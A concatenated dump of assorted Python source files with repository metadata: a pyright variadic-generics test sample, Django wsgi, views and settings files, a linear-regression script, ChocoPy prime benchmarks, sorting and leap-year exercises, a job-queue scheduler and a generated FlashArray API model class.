3bbbb2cf1a1bdbbecb89ef389036756f47ef7114
|
5ea620ad2008de57dcac720a84674bdb712bffc4
|
refs/heads/main
| 2023-08-26T05:54:43.660282 | 2021-10-30T16:35:06 | 2021-10-30T16:35:06 | 422,952,836 | 0 | 0 |
NOASSERTION
| 2021-10-30T17:52:03 | 2021-10-30T17:52:02 | null |
UTF-8
|
Python
| false | false | 2,648 |
py
|
# This sample tests the handling of variadic type variables used
# within Callable types.
# pyright: reportMissingModuleSource=false
from typing import Any, Callable, Literal, Protocol, Union
from typing_extensions import TypeVarTuple, Unpack
_Xs = TypeVarTuple("_Xs")
# NOTE: this is a type-checker conformance sample; the "# This should generate
# an error" comments are the expected-diagnostic oracle, so the code below is
# intentionally left exactly as written.
def func1(func: Callable[[int, Unpack[_Xs]], Any]) -> Callable[[Unpack[_Xs]], int]:
    ...
def func2(func: Callable[[Unpack[_Xs]], int]) -> Callable[[Unpack[_Xs]], int]:
    ...
def callback1(a: int) -> int:
    ...
def callback2(a: str) -> int:
    ...
def callback3(a: str) -> None:
    ...
def callback4(a: int, b: complex, c: str) -> int:
    ...
def callback5(a: int, *args: Unpack[_Xs]) -> Union[Unpack[_Xs]]:
    ...
def callback6(a: int, *args: Any) -> int:
    ...
def callback7(a: int, b: str, c: str, d: str, *args: Any) -> int:
    ...
c1 = func1(callback1)
t_c1: Literal["() -> int"] = reveal_type(c1)
c1_1 = c1()
t_c1_1: Literal["int"] = reveal_type(c1_1)
# This should generate an error.
c2 = func1(callback2)
# This should generate an error.
c3 = func2(callback3)
c4 = func1(callback4)
t_c4: Literal["(complex, str) -> int"] = reveal_type(c4)
c4_1 = c4(3j, "hi")
t_c4_1: Literal["int"] = reveal_type(c4_1)
# This should generate an error.
c4_2 = c4(3j)
# This should generate an error.
c4_3 = c4(3j, "hi", 4)
c5 = func1(callback5)
t_c5: Literal["(*_Xs@callback5) -> int"] = reveal_type(c5)
# This should generate an error.
c6_1 = func1(callback6)
# This should generate an error.
c6_2 = func2(callback6)
# This should generate an error.
c7_1 = func1(callback7)
# This should generate an error.
c7_2 = func2(callback7)
class CallbackA(Protocol[Unpack[_Xs]]):
    def __call__(self, a: int, *args: Unpack[_Xs]) -> Any:
        ...
def func3(func: CallbackA[Unpack[_Xs]]) -> Callable[[Unpack[_Xs]], int]:
    ...
d1 = func3(callback1)
t_d1: Literal["() -> int"] = reveal_type(d1)
# This should generate an error.
d2 = func3(callback2)
# This should generate an error.
d3 = func3(callback3)
d4 = func3(callback4)
t_d4: Literal["(complex, str) -> int"] = reveal_type(d4)
d4_1 = d4(3j, "hi")
t_d4_1: Literal["int"] = reveal_type(d4_1)
# This should generate an error.
d4_2 = d4(3j)
# This should generate an error.
d4_3 = d4(3j, "hi", 4)
def func4(func: Callable[[Unpack[_Xs], int], int]) -> Callable[[Unpack[_Xs]], int]:
    ...
def callback8(a: int, b: str, c: complex, d: int) -> int:
    ...
d5_1 = func4(callback1)
t_d5_1: Literal["() -> int"] = reveal_type(d5_1)
# This should generate an error.
d5_2 = func4(callback4)
d5_3 = func4(callback8)
t_d5_3: Literal["(int, str, complex) -> int"] = reveal_type(d5_3)
|
[
"[email protected]"
] | |
f8efb8796402968e0d65adeb58b5693319539a4e
|
ef60f1908dba8f3854148ad1395db43a23caa850
|
/libsystem/libsystem/wsgi.py
|
f884fcdd95b3300a8580e6a00c1f1d0ebd85e469
|
[] |
no_license
|
Richardo3/libsystem
|
797403038e23778843fc7bc4146bc37eaaa11361
|
8f025a1bfd7e902b6871cac8ccbd85503de67990
|
refs/heads/master
| 2020-05-04T19:43:50.454937 | 2019-04-05T09:11:47 | 2019-04-05T09:11:47 | 179,405,561 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 396 |
py
|
"""
WSGI config for libsystem project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before the application is built.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "libsystem.settings")
# Module-level WSGI callable used by servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
|
[
"[email protected]"
] | |
e87040c6a1bd846558f8c253422413cbb91f6f5f
|
161daf1046832d25e66858157f95eb226ecf7cdf
|
/Linear Regression/Single Variable Linear Regression Manually.py
|
6919d3f1af1bf449d416df7b20ca966b71574d64
|
[] |
no_license
|
Dipeshpal/Machine-Learning
|
551552c0f5fc922aa6f9f5ec5d522db983ae6063
|
626516ef9f0d63a67a073eab4fc266fd6510e482
|
refs/heads/master
| 2022-07-05T22:19:38.050175 | 2019-07-10T09:05:31 | 2019-07-10T09:05:31 | 188,903,340 | 0 | 0 | null | 2022-06-21T22:05:10 | 2019-05-27T20:10:12 |
Python
|
UTF-8
|
Python
| false | false | 2,101 |
py
|
# Linear Regression
# Import Libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# load dataset
dataset = pd.read_csv('headbrain.csv')
# dropping ALL duplicate values
dataset.drop_duplicates(keep=False, inplace=True)
print("Dataset head: ", dataset.head())
print("Dataset shape: ", dataset.shape)
# Correlations Matrix (Visualize Relations between Data)
# From this we can find which param has more relations
correlations = dataset.corr()
sns.heatmap(correlations, square=True, cmap="YlGnBu")
plt.title("Correlations")
plt.show()
# Getting feature (x) and label(y)
# From correlations matrix we found Head Size(cm^3) and Brain Weight(grams) are most co-related data
x = dataset["Head Size(cm^3)"].values
y = dataset["Brain Weight(grams)"].values
# Fitting Line (Model) y = mx + c
# where, m = summation[(x-mean_x)(y-mean_y)]%summation[(x-mean_x)**2]
# c = y - mx
mean_x = np.mean(x)
mean_y = np.mean(y)
# Total number of features
l = len(x)
# numerator = summation[(x-mean_x)(y-mean_y)
# denominator = summation[(x-mean_x)**2
numerator = 0
denominator = 0
for i in range(l):
    numerator += (x[i] - mean_x) * (y[i] - mean_y)
    denominator += (x[i] - mean_x) ** 2
# m is gradient (ordinary-least-squares slope)
m = numerator / denominator
# c is intercept
c = mean_y - (m * mean_x)
print("m: ", m)
print("c: ", c)
# for better visualization (Scaling of data) get max and min point of x
max_x = np.max(x) + 100
min_x = np.min(x) - 100
# X is data points (between max_x and min_y)
X = np.linspace(max_x, min_x, 10)
# model here (we know m and c, already calculated above on sample dataset)
Y = m*X + c
# plotting graph for model
plt.plot(X, Y, color='#58b970', label='Regression Line')
plt.scatter(x, y, c='#ef5424', label='Scatter Plot:n Given Data')
plt.legend()
plt.show()
# Calculate R Square (coefficient of determination: 1 - SSR/SST)
sst = 0
ssr = 0
for i in range(l):
    y_pred = m * x[i] + c
    sst += (y[i] - mean_y) ** 2
    ssr += (y[i] - y_pred) ** 2
# print("Sum of Squared Total: ", sst)
# print("Sum of Squared due to Regression: ", ssr)
r2 = 1 - (ssr / sst)
print("R Squared: ", r2)
|
[
"[email protected]"
] | |
aeb178754d3e11d4c0785eac82d396cb1a9efc7e
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/prime-big-431.py
|
6dff84319c64e9671d5fbc210e23958e95c5317e
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,705 |
py
|
# Get the n-th prime starting from 2
def get_prime(n:int) -> int:
    """Return the n-th prime (1-based: get_prime(1) == 2)."""
    candidate:int = 2
    found:int = 0
    while True:
        if is_prime(candidate):
            found = found + 1
            if found == n:
                return candidate
        candidate = candidate + 1

def is_prime(x:int) -> bool:
    """Trial-division primality test.

    Fixes: values below 2 are no longer reported as prime, and the unused
    padding locals div2..div5 were removed.
    """
    if x < 2:
        return False
    div:int = 2
    while div < x:
        if x % div == 0:
            return False
        div = div + 1
    return True
def is_prime2(x:int, x2:int) -> bool:
    """Trial-division primality test on x (x2 is benchmark padding, unused).

    Fixes: x < 2 is no longer reported prime; dead locals div2..div5 removed.
    """
    if x < 2:
        return False
    div:int = 2
    while div < x:
        if x % div == 0:
            return False
        div = div + 1
    return True
def is_prime3(x:int, x2:int, x3:int) -> bool:
    """Trial-division primality test on x (x2, x3 are padding, unused).

    Fixes: x < 2 is no longer reported prime; dead locals div2..div5 removed.
    """
    if x < 2:
        return False
    div:int = 2
    while div < x:
        if x % div == 0:
            return False
        div = div + 1
    return True
def is_prime4(x:int, x2:int, x3:int, x4:int) -> bool:
    """Trial-division primality test on x (x2..x4 are padding, unused).

    Fixes: the line "$TypedVar = 2" was a syntax error that broke the whole
    module; dead locals removed; x < 2 is no longer reported prime.
    """
    if x < 2:
        return False
    div:int = 2
    while div < x:
        if x % div == 0:
            return False
        div = div + 1
    return True
def is_prime5(x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
    """Trial-division primality test on x (x2..x5 are padding, unused).

    Fixes: x < 2 is no longer reported prime; dead locals div2..div5 removed.
    """
    if x < 2:
        return False
    div:int = 2
    while div < x:
        if x % div == 0:
            return False
        div = div + 1
    return True
# Input parameter
n:int = 15
n2:int = 15
n3:int = 15
n4:int = 15
n5:int = 15
# Run [1, n]
i:int = 1
i2:int = 1
i3:int = 1
i4:int = 1
i5:int = 1
# Crunch
# Only n and i drive the loop; the numbered copies are benchmark padding.
while i <= n:
    print(get_prime(i))
    i = i + 1
|
[
"[email protected]"
] | |
6cd6e5909a0368323c8af0e4fa9a44957c2f0f36
|
5636cb0c282d03e91a830d30cec3bd54c225bd3b
|
/P_05_AlgorithmiqueProgrammation/03_Tris/TD_01_Bulles/programmes/tri_bulles.py
|
3cb89b551a595d40d3e8a838803994b50a2c38c8
|
[] |
no_license
|
xpessoles/Informatique
|
24d4d05e871f0ac66b112eee6c51cfa6c78aea05
|
3cb4183647dc21e3acbcbe0231553a00e41e4e55
|
refs/heads/master
| 2023-08-30T21:10:56.788526 | 2021-01-26T20:57:51 | 2021-01-26T20:57:51 | 375,464,331 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 508 |
py
|
import random
def tri_bulles_naif(l):
    """Naive bubble sort: sorts l in place with n-1 full passes."""
    size = len(l)
    for _ in range(size - 1):
        for j in range(size - 1):
            if l[j] > l[j + 1]:
                l[j], l[j + 1] = l[j + 1], l[j]
def tri_bulles(l):
    """Bubble sort in place, skipping the already-settled tail each pass."""
    for settled in range(len(l) - 1):
        # After `settled` passes, the last `settled` items are in place.
        for j in range(len(l) - settled - 1):
            if l[j] > l[j + 1]:
                l[j], l[j + 1] = l[j + 1], l[j]
"""
l = [random.randint(0,10) for i in range(10)]
print(l)
tri_bulles_naif(l)
print(l)
"""
l = [random.randint(0,10) for i in range(10)]
print(l)
tri_bulles(l)
print(l)
|
[
"[email protected]"
] | |
1085ba45a8f735ea9ea5fa371a548f5de125ee1a
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/leap/a3b8b55879a04bce804d9c199db55772.py
|
c6ce2afde394c9c920e45ec48d6cd4dde93f53ae
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null |
UTF-8
|
Python
| false | false | 416 |
py
|
__author__ = 'Ben'
# on every year that is evenly divisible by 4
# except every year that is evenly divisible by 100
# unless the year is also evenly divisible by 400
def is_leap_year(year):
    """Return True for leap years.

    A leap year is divisible by 4, except century years, which must be
    divisible by 400. Behaviour is identical to the original chain of
    redundant modulo checks, written as guard clauses.
    """
    if year % 4 != 0:
        return False
    if year % 100 == 0:
        # Century years leap only when divisible by 400.
        return year % 400 == 0
    return True
|
[
"[email protected]"
] | |
feaa11ac9c9654dcac5b82c4723fcf59931647f2
|
ce60f76c6ad4c48fd6182240b302ee057809cc66
|
/extra/jobqueue/dispatcher.py
|
a9f043e8fc7ee4f9dd606e8201f33c3083a2c6dd
|
[
"MIT",
"LicenseRef-scancode-public-domain"
] |
permissive
|
bumps/bumps
|
8ae10e8d15c0aa64e0bab6e00e7fabb2ca1b0860
|
2594e69567d534b434dc0eae727b77fdeff411d4
|
refs/heads/master
| 2023-08-22T17:56:49.987181 | 2023-07-26T14:22:23 | 2023-07-26T14:22:23 | 2,799,064 | 48 | 28 |
NOASSERTION
| 2023-07-26T14:22:24 | 2011-11-17T22:22:02 |
Python
|
UTF-8
|
Python
| false | false | 6,471 |
py
|
from datetime import datetime, timedelta
import logging
from sqlalchemy import and_, or_, func, select
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from . import runjob, store, db, notify
from .db import Job, ActiveJob
class Scheduler(object):
    """Job-queue scheduler backed by the SQLAlchemy job database.

    Jobs move PENDING -> ACTIVE -> {COMPLETE, ERROR, CANCEL, DELETE}; job
    payloads (request/results) live in the external `store`.
    """
    def __init__(self):
        db.connect()
    def jobs(self, status=None):
        """Return job ids ordered by priority, optionally filtered by status."""
        session = db.Session()
        query = session.query(Job)
        if status:
            query = query.filter(Job.status == status)
        jobs = query.order_by(Job.priority)
        return [j.id for j in jobs]
    def submit(self, request, origin):
        """Queue *request* from *origin*; priority grows with recent usage."""
        session = db.Session()
        # Number of jobs for this user (by notify address or origin) in the
        # last 30 days; heavier users get a larger (i.e. later) priority.
        n = (session.query(Job)
             .filter(or_(Job.notify == request['notify'], Job.origin == origin))
             .filter(Job.date >= datetime.utcnow() - timedelta(30))
             .count()
             )
        job = Job(name=request['name'],
                  notify=request['notify'],
                  origin=origin,
                  priority=n)
        session.add(job)
        session.commit()
        store.create(job.id)
        store.put(job.id, 'request', request)
        return job.id
    def _getjob(self, id):
        """Fetch the Job row for *id*, or None."""
        session = db.Session()
        return session.query(Job).filter(Job.id == id).first()
    def results(self, id):
        """Return stored results for *id*, or at least its current status."""
        job = self._getjob(id)
        try:
            return runjob.results(id)
        except KeyError:
            if job:
                return {'status': job.status}
            else:
                return {'status': 'UNKNOWN'}
    def status(self, id):
        job = self._getjob(id)
        return job.status if job else 'UNKNOWN'
    def info(self, id):
        request = store.get(id, 'request')
        return request
    def cancel(self, id):
        """Request cancellation of a PENDING or ACTIVE job."""
        session = db.Session()
        (session.query(Job)
         .filter(Job.id == id)
         # Bug fix: Column.in_() takes a single iterable; the original passed
         # two positional strings, which raises a TypeError.
         .filter(Job.status.in_(('ACTIVE', 'PENDING')))
         .update({'status': 'CANCEL'})
         )
        session.commit()
    def delete(self, id):
        """
        Delete any external storage associated with the job id. Mark the
        job as deleted.
        """
        session = db.Session()
        (session.query(Job)
         .filter(Job.id == id)
         .update({'status': 'DELETE'})
         )
        # Bug fix: the status change was never committed in the original.
        session.commit()
        store.destroy(id)
    def nextjob(self, queue):
        """
        Make the next PENDING job active, where pending jobs are sorted
        by priority. Priority is assigned on the basis of usage and the
        order of submissions.
        """
        session = db.Session()
        # Lowest job id among the pending jobs with the minimum priority.
        _priority = select([func.min(Job.priority)],
                           Job.status == 'PENDING')
        min_id = select([func.min(Job.id)],
                        and_(Job.priority == _priority,
                             Job.status == 'PENDING'))
        for _ in range(10):  # Retry when another worker claims the same job
            # Get the next job, if there is one
            try:
                job = session.query(Job).filter(Job.id == min_id).one()
            except NoResultFound:
                return {'request': None}
            # Mark the job as active and record it in the active queue.
            (session.query(Job)
             .filter(Job.id == job.id)
             .update({'status': 'ACTIVE',
                      'start': datetime.utcnow(),
                      }))
            activejob = db.ActiveJob(jobid=job.id, queue=queue)
            session.add(activejob)
            # The first process to insert the ActiveJob row wins; losers hit
            # the integrity error, roll back, and retry with the next job.
            try:
                session.commit()
            except IntegrityError:
                session.rollback()
                continue
            break
        else:
            logging.critical('dispatch could not assign job %s' % job.id)
            raise IOError('dispatch could not assign job %s' % job.id)
        request = store.get(job.id, 'request')
        # No reason to include time; email or twitter does that better than
        # we can without client locale information.
        notify.notify(user=job.notify,
                      msg=job.name + " started",
                      level=1)
        return {'id': job.id, 'request': request}
    def postjob(self, id, results):
        """Record *results* for job *id*, deactivate it, and notify the owner."""
        # TODO: redundancy check, confirm queue, check sig, etc.
        session = db.Session()
        (session.query(Job)
         .filter(Job.id == id)
         .update({'status': results.get('status', 'ERROR'),
                  'stop': datetime.utcnow(),
                  })
         )
        (session.query(ActiveJob)
         .filter(ActiveJob.jobid == id)
         .delete())
        try:
            session.commit()
        except Exception:
            # Narrowed from a bare except; still best-effort on purpose.
            session.rollback()
        # Save results
        store.put(id, 'results', results)
        # Post notification
        job = self._getjob(id)
        if job.status == 'COMPLETE':
            if 'value' in results:
                status_msg = " ended with %s" % results['value']
            else:
                status_msg = " complete"
        elif job.status == 'ERROR':
            status_msg = " failed"
        elif job.status == 'CANCEL':
            status_msg = " cancelled"
        else:
            status_msg = " with status " + job.status
        # Note: no reason to include time; twitter or email will give it.
        notify.notify(user=job.notify,
                      msg=job.name + status_msg,
                      level=2)
|
[
"[email protected]"
] | |
eebbab8cc0fe982d9573dbef8fc19af5181a7c48
|
9b77f1e31d5901924431a2a3164312cc346bde4f
|
/ADI_MINI_PROJECT/blog/views.py
|
77aca8b4054fcba1c1dd859c800aa3a307556c0c
|
[] |
no_license
|
Adi19471/Djnago_Code-Daily
|
c2184bf21db5c8d4b3c4098fbd593e4949375ae8
|
03b1b70d3e187fe85eb24e88b7ef3391b14aa98c
|
refs/heads/master
| 2023-08-14T14:36:36.144243 | 2021-09-20T12:52:46 | 2021-09-20T12:52:46 | 375,690,484 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,673 |
py
|
from django.shortcuts import render,HttpResponseRedirect
from .forms import SignupForm,LoginForm,PostForm
from django.contrib import messages
from django.contrib.auth import authenticate,login,logout
from .models import Post
# home page
def home(request):
    """Landing page: render every blog post."""
    all_posts = Post.objects.all()
    context = {'posts': all_posts}
    return render(request, 'blog/home.html', context)
#about page
def about(request):
    """Static about page."""
    return render(request, 'blog/about.html')
# contact page
def contact(request):
    """Static contact page."""
    return render(request, 'blog/contact.html')
# dahsboard page
def dashbord(request):
    """Author dashboard listing all posts; anonymous users go to login.

    Note: the view/URL name keeps the original 'dashbord' spelling since
    redirects elsewhere in this module rely on it.
    """
    if request.user.is_authenticated:
        posts = Post.objects.all()
        # NOTE(review): the third positional argument to messages.info is
        # extra_tags, not a second message -- confirm this is intended.
        messages.info(request,'you enter DashBoard....!!!','dont you want dashboed then click okay')
        return render(request, 'blog/dashbord.html',{'posts':posts})
    else:
        return HttpResponseRedirect('/login/')
# logout page
def user_logout(request):
    """Log the current user out and send them to the home page."""
    logout(request)
    return HttpResponseRedirect('/')
#signup page
def user_signup(request):
    """Author registration; on success the success message is flashed and
    the (still-bound) form is re-rendered."""
    if request.method == "POST":
        form = SignupForm(request.POST)
        if form.is_valid():
            messages.info(request,'Congratulation..!! You have become a Author')
            form.save()
    else:
        form = SignupForm()
    return render(request, 'blog/signup.html',{'form':form})
# login page
def user_login(request):
    """Authenticate a user; already-authenticated users go to the dashboard.

    On failed authentication (or an invalid form) the bound form falls
    through to the final render, so field errors are shown.
    """
    if not request.user.is_authenticated:
        if request.method == "POST":
            form = LoginForm(request=request, data=request.POST)
            if form.is_valid():
                uname = form.cleaned_data['username']
                upass = form.cleaned_data['password']
                user = authenticate(username=uname, password=upass)
                if user is not None:
                    login(request, user)
                    messages.success(request, 'Logged in Successfully !!')
                    return HttpResponseRedirect('/dashbord/')
        else:
            form = LoginForm()
        return render(request, 'blog/login.html', {'form':form})
    else:
        return HttpResponseRedirect('/dashbord/')
# add new post
def add_post(request):
    """Create a new Post from PostForm input.

    Anonymous visitors are redirected to the login page. On a valid POST the
    post is saved and a fresh empty form is rendered again.
    """
    if not request.user.is_authenticated:
        # BUG FIX: was `HttpresponseRedirect` (wrong capitalisation), which
        # raised NameError for anonymous users instead of redirecting.
        return HttpResponseRedirect('/login/')
    if request.method == 'POST':
        form = PostForm(request.POST)
        if form.is_valid():
            ti = form.cleaned_data['title']
            de = form.cleaned_data['desc']
            dt = form.cleaned_data['date_time']
            user = Post(title=ti, desc=de, date_time=dt)
            user.save()
            messages.warning(request,'you go to dashboard MENU okay....?')
            # Show a fresh, empty form after a successful save.
            form = PostForm()
    else:
        form = PostForm()
    return render(request,'blog/addpost.html',{'form':form})
# update post
def update_post(request,id):
    """Edit the existing Post with primary key ``id``.

    GET pre-fills the form from the instance; a valid POST saves the changes
    and re-renders the bound form.
    """
    if not request.user.is_authenticated:
        # BUG FIX: was `HttpresponseRedirect` (wrong capitalisation), which
        # raised NameError for anonymous users instead of redirecting.
        return HttpResponseRedirect('/login/')
    if request.method == 'POST':
        pi = Post.objects.get(pk=id)
        form = PostForm(request.POST,instance=pi)
        if form.is_valid():
            form.save()
    else:
        pi = Post.objects.get(pk=id)
        form = PostForm(instance=pi)
    return render(request,'blog/update.html',{'form':form})
# delete post
def delete_post(request, id):
    """Delete the Post with primary key ``id`` (POST only), then return to the dashboard.

    Anonymous visitors are redirected to the login page. (The dead
    commented-out earlier version of this view — which contained a syntax
    error and a misspelled `HttpresponseRedirect` — has been removed.)
    """
    if not request.user.is_authenticated:
        return HttpResponseRedirect('/login/')
    if request.method == 'POST':
        pi = Post.objects.get(pk = id)
        pi.delete()
    # GET requests simply bounce back to the dashboard without deleting.
    return HttpResponseRedirect('/dashbord/')
|
[
"[email protected]"
] | |
35a9a876dc10d8de63623e6d3d37890bb3842900
|
bea3febeda4c0688dfbb2db584ab4f7d710040e0
|
/django/cbv/person/views.py
|
c954514b57714390b9b1210f810dd5c51ab31499
|
[] |
no_license
|
airpong/TIL-c9
|
c471ac73e23716cf677ba590dd6099e584c42883
|
069cc53820a09cd9787765ad41ba7e792dc342b5
|
refs/heads/master
| 2022-12-12T22:26:23.147651 | 2019-06-27T08:24:44 | 2019-06-27T08:24:44 | 166,777,129 | 0 | 0 | null | 2022-11-22T03:46:57 | 2019-01-21T08:34:01 |
Python
|
UTF-8
|
Python
| false | false | 999 |
py
|
from django.shortcuts import render,redirect
from .models import Person
from .forms import PersonForm
from django.views.generic import ListView,CreateView
from django.contrib.auth.mixins import LoginRequiredMixin
# Create your views here.
# def list(request):
# people = Person.objects.all()
# return render(request,'person/person_list.html',{'people':people})
class PersonList(ListView):
    """CBV list view for Person; renders person_list.html with context name 'people'."""
    model = Person
    # Template variable name for the queryset (default would be 'object_list').
    context_object_name = 'people'
# def create(request):
# if request.method == 'GET':
# form = PersonForm()
# return render(request,'person/person_form.html',{'form':form})
# else:
# last_name = request.POST.get('last_name')
# email = request.POST.get('email')
# age = request.POST.get('age')
# Person.objects.create(last_name=last_name,email=email,age=age)
# return redirect('list')
class PersonCreate(LoginRequiredMixin,CreateView):
    """Login-protected create view for Person; redirects to /person/ on success."""
    model = Person
    form_class = PersonForm
    success_url = '/person/'
|
[
"[email protected]"
] | |
18f7fd778281764630b6d87c06f297330644c9a1
|
7bededcada9271d92f34da6dae7088f3faf61c02
|
/pypureclient/flasharray/FA_2_17/models/reference_with_type.py
|
686da10b71d57d6ece1d116f5a7668ce8c35aa23
|
[
"BSD-2-Clause"
] |
permissive
|
PureStorage-OpenConnect/py-pure-client
|
a5348c6a153f8c809d6e3cf734d95d6946c5f659
|
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
|
refs/heads/master
| 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 |
BSD-2-Clause
| 2023-09-08T09:08:30 | 2018-12-04T17:02:51 |
Python
|
UTF-8
|
Python
| false | false | 4,557 |
py
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class ReferenceWithType(object):
    """
    Swagger-generated model: a typed reference to another FlashArray resource.

    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'id': 'str',
        'name': 'str',
        'resource_type': 'str'
    }

    attribute_map = {
        'id': 'id',
        'name': 'name',
        'resource_type': 'resource_type'
    }

    # No constructor arguments are mandatory for this model.
    required_args = {
    }

    def __init__(
        self,
        id=None,  # type: str
        name=None,  # type: str
        resource_type=None,  # type: str
    ):
        """
        Keyword args:
            id (str): A globally unique, system-generated ID. The ID cannot be modified.
            name (str): The resource name, such as volume name, pod name, snapshot name, and so on.
            resource_type (str): Type of the object (full name of the endpoint). Valid values are `hosts`, `host-groups`, `network-interfaces`, `pods`, `ports`, `pod-replica-links`, `subnets`, `volumes`, `volume-snapshots`, `volume-groups`, `directories`, `policies/nfs`, `policies/smb`, and `policies/snapshot`, etc.
        """
        # Only set attributes that were explicitly provided; unset attributes
        # are left absent so __getattribute__ raises AttributeError for them.
        if id is not None:
            self.id = id
        if name is not None:
            self.name = name
        if resource_type is not None:
            self.resource_type = resource_type

    def __setattr__(self, key, value):
        # Reject attributes that are not part of the swagger model.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
        self.__dict__[key] = value

    def __getattribute__(self, item):
        value = object.__getattribute__(self, item)
        # Unresolved Property placeholders behave as if the attribute is unset.
        if isinstance(value, Property):
            raise AttributeError
        else:
            return value

    def __getitem__(self, key):
        # Dict-style read access, restricted to declared model attributes.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
        return object.__getattribute__(self, key)

    def __setitem__(self, key, value):
        # Dict-style write access, restricted to declared model attributes.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
        object.__setattr__(self, key, value)

    def __delitem__(self, key):
        # Dict-style deletion, restricted to declared model attributes.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
        object.__delattr__(self, key)

    def keys(self):
        return self.attribute_map.keys()

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.swagger_types):
            if hasattr(self, attr):
                value = getattr(self, attr)
                if isinstance(value, list):
                    result[attr] = list(map(
                        lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                        value
                    ))
                elif hasattr(value, "to_dict"):
                    result[attr] = value.to_dict()
                elif isinstance(value, dict):
                    result[attr] = dict(map(
                        lambda item: (item[0], item[1].to_dict())
                        if hasattr(item[1], "to_dict") else item,
                        value.items()
                    ))
                else:
                    result[attr] = value
        if issubclass(ReferenceWithType, dict):
            for key, value in self.items():
                result[key] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ReferenceWithType):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
[
"[email protected]"
] | |
0f7ec680721030d047f06b1b94341a7c982454b5
|
402ef712e2d98bb616e64eb7d57145a643ad61d7
|
/backend/mobile_testing_app__15569/wsgi.py
|
7832e8909382ddeb029a4fbf984861ab927942fb
|
[] |
no_license
|
crowdbotics-apps/mobile-testing-app--15569
|
ce5299c1dc7b5ebf531043dbe7614c7206880ce0
|
5c6e5f045a9ba80592e81584ac7c88ea53eabdfa
|
refs/heads/master
| 2023-01-24T21:54:07.548231 | 2020-11-24T06:01:05 | 2020-11-24T06:01:05 | 315,533,722 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 427 |
py
|
"""
WSGI config for mobile_testing_app__15569 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application

# Default the settings module so WSGI servers can import this file directly.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobile_testing_app__15569.settings')
# Module-level WSGI callable expected by servers (gunicorn, uWSGI, mod_wsgi).
application = get_wsgi_application()
|
[
"[email protected]"
] | |
235f40b873b377065055784a18c708cd33c11a20
|
dbdb9b2102b25808f0363d50ff85626921b1c70a
|
/rest_api_3_product/settings.py
|
baee96ac579b1af253e75334bad35faaa15bf71c
|
[] |
no_license
|
vinodkumar96/rest_api_3_product
|
dee834e704c25c812ba94a682641ab7f9bcabd44
|
b0be03b80d7b59ef4d81e02f977c5ed1df862709
|
refs/heads/master
| 2020-07-04T20:38:15.552542 | 2019-08-14T19:08:09 | 2019-08-14T19:08:09 | 202,409,475 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,242 |
py
|
"""
Django settings for rest_api_3_product project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repository; rotate it and load
